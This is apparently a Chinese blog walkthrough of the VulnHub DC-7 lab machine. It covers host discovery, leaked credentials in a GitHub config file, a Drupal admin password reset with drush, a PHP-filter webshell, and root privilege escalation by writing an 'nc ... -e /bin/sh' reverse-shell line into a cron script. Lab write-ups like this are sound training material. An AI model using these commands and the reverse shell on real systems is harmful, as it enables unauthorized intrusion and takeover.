vulnhub靶机:dc-7

本文描述了一次渗透测试的过程,包括使用ARP扫描、端口扫描工具进行主机发现,通过SSH尝试登录,发现Drush命令漏洞并利用它修改了管理员密码,最终通过添加反弹shell在定时任务中实现提权。涉及的技术包括PHP、Drupal8和网络安全实践。

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.157

2:端口扫描

nmap -A -p- -T4 10.9.23.157

3:端口探测

给的提示去搜索一下

@DC7USER

发现是github的一些代码,下载进行查看

在config.php配置文件里发现了用户名和密码

$username = "dc7user";

$password = "MdR3xOgB7#dW";

尝试右上角的登录界面

登陆失败

二:渗透测试

1:ssh登录

尝试ssh登录

ssh dc7user@10.9.23.157

在产看文件发现存在一个定时任务

cd /opt/scripts/

2:漏洞利用

发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。

drush常用命令:

解释

$ drush cr 各种清缓存 $ drush pm-enable 安装module $ drush pm-uninstall 卸载module $ drush pm-list 显示所有modules and themes列表 $ drush user-password admin --password "123" 更改密码

cd /var/www/html

drush user-password admin --password="root"

然后用更改后的密码登录到系统中:

使用以下命令创建新用户:

drush user-create root --password "root"

drush user-password root --password="root"

新创建的用户没有东西,还是去admin

dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装

PHP | Drupal.org

在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加,命名为ceshi。选择format为php code。

挂一句话木马()

使用蚁剑连接,反弹shell

三:提权

写入反弹shell、交互式shell然后提权,不过前面用drash命令时,发现是定时任务,可以再定时任务中添加用/bin/bash执行的nc命令,然后监听:

nc 10.9.23.112 6666 -e /bin/sh

定时任务需要等待一会

成功拿下

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值